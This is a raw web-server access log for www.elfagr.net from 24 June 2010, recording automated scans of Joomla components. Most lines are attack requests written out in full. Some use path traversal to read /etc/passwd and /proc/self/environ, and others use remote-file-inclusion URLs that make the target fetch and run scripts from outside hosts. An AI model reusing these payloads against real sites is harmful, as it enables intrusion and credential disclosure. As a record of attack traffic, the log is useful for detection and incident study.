207.45.176.98 - - [24/Jun/2010:22:26:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:28:20 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:28:31 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:28:22 -0700] "GET /logs/access_091217.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:28:32 -0700] "GET /logs/access_100225.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:34:18 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:34:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:34:19 -0700] "GET /logs/access_091217.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
209.116.59.107 - - [24/Jun/2010:22:34:19 -0700] "GET /logs/access_100225.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://comstar-e.com/images/manuf/jx/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:34:44 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:34:35 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:35:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:36:01 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
207.45.176.98 - - [24/Jun/2010:22:36:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:45:23 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:45:34 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
213.171.37.206 - - [24/Jun/2010:22:48:33 -0700] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
213.171.37.206 - - [24/Jun/2010:22:48:43 -0700] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:49:39 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:49:40 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
195.56.55.217 - - [24/Jun/2010:22:50:50 -0700] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.56.55.217 - - [24/Jun/2010:22:50:40 -0700] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
213.171.37.206 - - [24/Jun/2010:22:53:07 -0700] "GET /logs/access_091126.log/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:55:47 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:55:48 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:55:59 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:22:56:00 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:20 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:20 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:20 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:31 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:31 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
94.23.7.24 - - [24/Jun/2010:23:00:31 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:23:00:22 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:23:00:33 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
69.64.91.113 - - [24/Jun/2010:23:00:24 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.elfagr.net"
69.64.91.113 - - [24/Jun/2010:23:00:24 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.elfagr.net"
66.191.139.210 - - [24/Jun/2010:23:00:54 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
66.191.139.210 - - [24/Jun/2010:23:00:55 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:23:02:29 -0700] "GET /logs/access_100415.log/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:23:02:29 -0700] "GET /index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
67.15.152.183 - - [24/Jun/2010:23:02:29 -0700] "GET /logs/index.php?option=com_joomlaradiov5&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:23:08:29 -0700] "GET /logs/access_091126.log/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:23:08:29 -0700] "GET /?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [24/Jun/2010:23:08:30 -0700] "GET /logs/?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.803" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:09:38 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:09:49 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:09:39 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:33 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:33 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:44 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:46 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:36 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:10:37 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.21.79.214 - - [24/Jun/2010:23:11:34 -0700] "GET /logs/access_100520.log/videodb.class.xml.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
81.21.79.214 - - [24/Jun/2010:23:11:24 -0700] "GET /videodb.class.xml.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
81.21.79.214 - - [24/Jun/2010:23:11:25 -0700] "GET /logs/videodb.class.xml.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:11:46 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:11:58 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:11:50 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:12:45 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:12:54 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:12:56 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:13:08 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:13:04 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:13:16 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:13:09 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:13:38 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
93.158.149.32 - - [24/Jun/2010:23:17:00 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:20:58 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:20:58 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:20:49 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:20:49 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.21.79.214 - - [24/Jun/2010:23:22:15 -0700] "GET /logs/videodb.class.xml.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
81.21.79.214 - - [24/Jun/2010:23:22:05 -0700] "GET /videodb.class.xml.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:22:09 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
85.25.124.13 - - [24/Jun/2010:23:22:09 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:22:51 -0700] "GET /logs/access_100218.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:22:52 -0700] "GET ///index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:23:03 -0700] "GET /logs////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:27:42 -0700] "GET /logs/access_100107.log////index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.123.133.162 - - [24/Jun/2010:23:29:29 -0700] "GET /logs/access_100520.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
174.123.133.162 - - [24/Jun/2010:23:29:29 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
174.123.133.162 - - [24/Jun/2010:23:29:39 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
193.231.187.33 - - [24/Jun/2010:23:29:54 -0700] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [24/Jun/2010:23:29:44 -0700] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
110.136.223.92 - - [24/Jun/2010:23:32:36 -0700] "GET /logs/access.log HTTP/1.1" 200 294632 "http://www.google.co.id/search?q=202.147.196.227&hl=id&ei=cEskTLvNDYmXrAfyy7nZDQ&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:33:05 -0700] "GET /logs/access_100218.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:32:55 -0700] "GET ///index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:32:56 -0700] "GET /logs////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
110.136.223.92 - - [24/Jun/2010:23:33:14 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.elfagr.net"
110.136.223.92 - - [24/Jun/2010:23:33:17 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:34:54 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:35:06 -0700] "GET /components/com_videodb/core/videodb.class.xml.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
202.62.103.120 - - [24/Jun/2010:23:34:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
193.231.187.33 - - [24/Jun/2010:23:34:57 -0700] "GET /logs/access_091126.log/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
193.231.187.33 - - [24/Jun/2010:23:34:57 -0700] "GET /logs/access_091112.log/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:36:12 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
86.109.170.65 - - [24/Jun/2010:23:36:15 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
202.62.103.120 - - [24/Jun/2010:23:37:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
94.155.49.192 - - [24/Jun/2010:23:38:46 -0700] "GET /logs/access_100107.log////index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
110.136.223.92 - - [24/Jun/2010:23:39:01 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4" "www.elfagr.net"
174.123.133.162 - - [24/Jun/2010:23:39:00 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
174.123.133.162 - - [24/Jun/2010:23:39:00 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
202.62.103.120 - - [24/Jun/2010:23:41:00 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
69.175.83.34 - - [24/Jun/2010:23:49:28 -0700] "GET /logs/access_091015.log%20%20//?path=http://www.vivahost.com/gg/whmcs/fx29.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
69.175.83.34 - - [24/Jun/2010:23:49:28 -0700] "GET /logs/access_091119.log%20%20//?path=http://www.vivahost.com/gg/whmcs/fx29.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
69.175.83.34 - - [24/Jun/2010:23:49:28 -0700] "GET /?path=http://www.vivahost.com/gg/whmcs/fx29.txt??? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "www.elfagr.net"
